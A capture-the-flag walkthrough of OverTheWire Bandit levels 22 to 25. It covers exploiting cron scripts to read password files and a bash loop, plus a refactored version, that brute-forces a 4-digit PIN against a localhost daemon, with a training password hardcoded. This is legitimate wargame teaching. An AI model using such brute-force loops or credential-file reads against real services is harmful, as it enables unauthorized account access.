OVERTHEWIRE:BANDIT WALKTHROUGH SERIES 23-25 LEVELS

This is part of the OverTheWire series: a Bandit walkthrough from level 23 – 26. If you haven't gone through the previous articles on OverTheWire Bandit, follow the links below!

Overthewire:Bandit walkthrough Series 1-5 Levels

OVERTHEWIRE:BANDIT WALKTHROUGH SERIES 5-12 LEVELS

OVERTHEWIRE:BANDIT WALKTHROUGH SERIES 12-15 LEVELS

OVERTHEWIRE:BANDIT WALKTHROUGH SERIES 16-18 LEVELS

LEVEL 22 – 23

Log in to bandit22 with the password we obtained in the article above.

The hint for this level says:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

So I looked into /etc/cron.d and found cronjob_bandit23.

[Screenshot: overthewire bandit level 23]

The cron job runs a script called cronjob_bandit23.sh. When you cat this script, you will find:

It takes the current user and stores the value in the variable myname.

It then stores the md5 hash of the current user profile in the variable called mytarget.

Then it copies the password from /etc/bandit_pass/levelname to /tmp/md5hash, using the hash generated above as the file name.

The script is fairly self-explanatory, so I ran its lines individually to get the value and the password.

[Screenshot: overthewire bandit 23]

The above screenshot shows the password for level 23.

LEVEL 23 – 24

Log in as bandit23 with the password obtained above.

This level is similar to the last level.

The hint says:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

You don’t have to create a script or anything.

The password can be easily obtained by the steps we followed in the last level. If you want, you can create a script!

[Screenshot: overthewire bandit 24]

The above code is nothing but the deletion code. The hint says that our script will be deleted once we execute it. This piece of code does that!

[Screenshot: overthewire bandit 24]

I have used the above strategy to get the password for level 24!

LEVEL 24 – 25

Log in as bandit24 with the above credentials.

The hint for this level says:

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

[Screenshot: overthewire bandit 25]

The above screenshot is the output of the nc command when I connected to localhost on port 30002 from the bandit24 login.

In this particular level we need to create a script that will brute-force the pincode.

My script is:

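#!/bin/bash
# Password for bandit24, obtained in the previous level
ban24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
# Walk every 4-digit pincode, zero-padded: 0000..9999
for i in {0000..9999}
do
    # Send "<password> <pin>" to the daemon and capture its reply
    b=$(echo "$ban24 $i" | nc localhost 30002)

    # An empty reply means the connection failed, so it does not count as a hit
    if [[ -n $b && $b != *"Wrong"* ]]
    then
        echo "Pin is: $i"
        echo "$ban24 $i" | nc localhost 30002
        break
    fi
    echo "trying pin $i"
    echo "$b"
done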

You will have to wait patiently for a million years, and then it will give you the *password*.

[Screenshot: overthewire bandit 25]
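The same loop split into testable functions, as an added example that is not the author's script: it zero-pads the counter so PINs below 1000 are covered, and it treats an empty reply as an error instead of a hit. The function names, PLACEHOLDER_PASS and the "Correct!" reply of the stand-in daemon are constructed for illustration.

```shell
#!/bin/bash
# Added example, not the author's script. Function names are hypothetical.

# Classify one reply from the checker. An empty reply (refused connection,
# timeout) is an error, not a hit: a bare "does not contain Wrong" test
# would report it as the correct PIN.
classify() {
    case "$1" in
        '')      echo error ;;
        *Wrong*) echo wrong ;;
        *)       echo hit ;;
    esac
}

# brute PASSWORD SENDER [ARGS...]
# Walks 0000..9999 (zero-padded, so PINs below 1000 are covered), pipes
# "PASSWORD PIN" to the sender command, and prints the first PIN whose
# reply classifies as a hit. Returns 1 if none, 2 on an empty reply.
brute() {
    local pass=$1 n=0 pin reply
    shift
    while [ "$n" -le 9999 ]; do
        pin=$(printf '%04d' "$n")
        reply=$(printf '%s %s\n' "$pass" "$pin" | "$@")
        case "$(classify "$reply")" in
            hit)   printf '%s\n' "$pin"; return 0 ;;
            error) echo "empty reply at PIN $pin" >&2; return 2 ;;
        esac
        n=$((n + 1))
    done
    return 1
}

# Constructed stand-in for the daemon so the logic can be checked offline:
# it accepts only the placeholder password with PIN 0042.
fake_daemon() {
    local line
    IFS= read -r line
    if [ "$line" = "PLACEHOLDER_PASS 0042" ]; then
        echo "Correct!"
    else
        echo "Wrong!"
    fi
}

# Offline check:  brute PLACEHOLDER_PASS fake_daemon
# On the level:   brute "$ban24" nc localhost 30002
```

A loop that starts counting at 1000 never reaches the stand-in's PIN 0042, which is why the full 0000 to 9999 range matters.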

The link for level 26 is here
